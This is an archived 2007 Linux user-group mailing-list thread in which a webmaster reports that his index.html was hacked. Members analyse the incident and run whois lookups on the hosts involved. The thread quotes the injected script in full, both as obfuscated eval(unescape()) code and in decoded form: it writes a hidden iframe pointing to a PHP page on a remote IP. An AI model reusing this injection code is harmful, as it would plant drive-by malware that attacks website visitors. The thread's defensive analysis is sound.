[ale] I've been hacked!
Adrin
adrin at bellsouth.net
Wed Nov 21 18:43:49 EST 2007
NICE!!!!
When you click on the link. You get forwarded to another place instead.
It doesn't do anything on a Linux machine using firefox. the page
appears to be blank.
http://72.232.116.12/~futured/frt23.php?'+Math.round(Math.random()*46683)+'a9b%5c'
And a whois 72.232.116.12
OrgName: Layered Technologies, Inc.
OrgID: LAYER-3
Address: 5085 W Park Blvd
Address: Suite 700
City: Plano
StateProv: TX
PostalCode: 75093
Country: US
ReferralServer: rwhois://rwhois.layeredtech.com:4321
NetRange: 72.232.0.0 - 72.233.127.255
CIDR: 72.232.0.0/16, 72.233.0.0/17
NetName: LAYERED-TECH-
NetHandle: NET-72-232-0-0-1
Parent: NET-72-0-0-0-0
NetType: Direct Allocation
NameServer: NS1.LAYEREDTECH.COM
NameServer: NS2.LAYEREDTECH.COM
Comment: Please send all abuse complaints to
Comment: abuse at layeredtech.com
RegDate: 2005-09-07
Updated: 2007-02-27
RTechHandle: JPS66-ARIN
RTechName: Suo-Anttila, Jeremy Paul
RTechPhone: +1-972-398-7998
RTechEmail: jps at layeredtech.com
OrgAbuseHandle: LAT-ARIN
OrgAbuseName: LT Abuse Team
OrgAbusePhone: +1-972-398-7998
OrgAbuseEmail: abuse at layeredtech.com
OrgNOCHandle: LIT-ARIN
OrgNOCName: LT IP-Network Team
OrgNOCPhone: +1-972-398-7998
OrgNOCEmail: ipnet at layeredtech.com
OrgTechHandle: LNT3-ARIN
OrgTechName: LT NOC Team
OrgTechPhone: +1-972-398-7998
OrgTechEmail: ipnet at layeredtech.com
# ARIN WHOIS database, last updated 2007-11-20 19:10
# Enter ? for additional hints on searching ARIN's WHOIS database.
Found a referral to rwhois.layeredtech.com:4321.
%rwhois V-1.5:001eff:00 rwhois.layeredtech.com (by Network Solutions,
Inc. V-1.5.7.3)
network:Class-Name:network
network:ID:ORG-LAYER-3.72.232.0.0/16
network:Auth-Area:72.232.0.0/16
network:Network-Name:72.232.116.1/25
network:IP-Network:72.232.116.1/25
network:Organization;I:romansemenchuk.com
network:Org-Name:romansemenchuk.com
network:Street-Address:Private Residence contact abuse at layeredtech.com
for details
network:City:Kharkov
network:State:of Kharkov
network:Postal-Code:61052
network:Country-Code:UA
network:Phone:972-398-7998
network:Tech-Contact;I:hostmaster at layeredtech.com
network:Admin-Contact;I:support at layeredtech.com
network:Abuse-Contact;I:abuse at layeredtech.com
network:Created:20070257
network:Updated:20070257
network:Updated-By:hostmaster at layeredtech.com
On Wed, 2007-11-21 at 18:33 -0500, Adrin wrote:
> whois 69.73.146.142
>
> OrgName: Jaguar Technologies LLC
> OrgID: JTL-8
> Address: 4201 SW Freeway suite#216
> City: Houston
> StateProv: TX
> PostalCode: 77027
> Country: US
>
> NetRange: 69.73.128.0 - 69.73.191.255
> CIDR: 69.73.128.0/18
> NetName: JAGUAR-TECHNOLOGIES-NOC
> NetHandle: NET-69-73-128-0-1
> Parent: NET-69-0-0-0-0
> NetType: Direct Allocation
> NameServer: NS.NOCDIRECT.COM
> NameServer: NS2.NOCDIRECT.COM
> Comment: NOCDIRECT
> RegDate: 2003-11-05
> Updated: 2005-04-15
>
> RAbuseHandle: ABUSE370-ARIN
> RAbuseName: Abuse
> RAbusePhone: +1-713-960-1502
> RAbuseEmail: abuse at jaguarpc.com
>
> OrgTechHandle: GL538-ARIN
> OrgTechName: Landis, Greg
> OrgTechPhone: +1-832-279-5529
> OrgTechEmail: greg at jaguarpc.com
>
> # ARIN WHOIS database, last updated 2007-11-20 19:10
> # Enter ? for additional hints on searching ARIN's WHOIS database.
>
> I seem to recall that IIS has/had a hosting bug of some type. From what
> I remember one virtual hosting domain could infect another on the same
> server. I wish I could remember were I read about it. I remember
> mostly that is was a RED HAT hosting site that had switch to M$ because
> of SCO Lawyers.
>
>
>
> On Wed, 2007-11-21 at 06:57 -0500, Jim Lynch wrote:
> > Last summer I received notification from Google that a web page on one
> > of my web hosting accounts was infected with some sort of malware bug.
> >
> > This account only has ftp access so I changed the password for the one
> > and only ftp account and removed the offending code from my index.html
> > file. I also added a cron job to another site to compare a good
> > index.html with the one on the site that had been hacked in case they
> > came back.
> >
> > They did.
> >
> > Today I received a message that said the compare failed and found the
> > following at the top of the body in my index.html file:
> >
> > <script>eval(unescape("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%37%62%37%33%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f%2f%36%39%2e%37%33%2e%31%34%36%2e%31%34%32%2f%7e%61%62%6f%75%6e%64%69%6e%2f%69%6d%61%67%65%73%2f%66%72%74%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%34%36%36%38%33%29%2b%27%61%39%62%5c%27%20%77%69%64%74%68%3d%33%35%31%20%68%65%69%67%68%74%3d%31%33%33%20%73%74%79%6c%65%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29"));
> > </script>
> >
> > That script, unescaped looks like:
> >
> > window.status='Done';document.write('<iframe name=7b73
> > src=\'http://69.73.146.142/~aboundin/images/frt.php?'+Math.round(Math.random()*46683)+'a9b\'
> > width=351 height=133 style=\'display: none\'></iframe>'
> >
> > Has anyone seen anything like this before? I wonder what sort of evil
> > function it might perform?
> >
> > I also wonder how they got access the second time? I went through the
> > cgi scripts on that system to be sure they were mine. There aren't any
> > php files on the system.
> >
> > I attempted to look up the ip address but nslookup said it didn't exist,
> > however it pings and the index.html file from it is the default apache2
> > index file. I suspect that system has been hacked as well.
> >
> > Note the incident from last Summer was a different one.
> >
> > Thanks,
> > Jim.
> >
> >
> > _______________________________________________
> > Ale mailing list
> > Ale at ale.org
> > http://www.ale.org/mailman/listinfo/ale
>
> _______________________________________________
> Ale mailing list
> Ale at ale.org
> http://www.ale.org/mailman/listinfo/ale
More information about the Ale
mailing list